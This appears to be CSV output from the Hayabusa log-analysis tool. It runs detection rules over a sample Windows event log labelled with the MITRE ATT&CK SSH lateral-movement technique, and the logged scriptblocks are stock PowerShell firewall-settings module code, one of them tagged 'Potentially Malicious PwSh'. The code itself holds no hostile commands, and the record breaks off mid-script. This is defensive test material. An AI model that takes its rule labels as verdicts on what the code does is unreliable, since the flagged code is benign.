+2021-04-22 19:19:38.861 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} 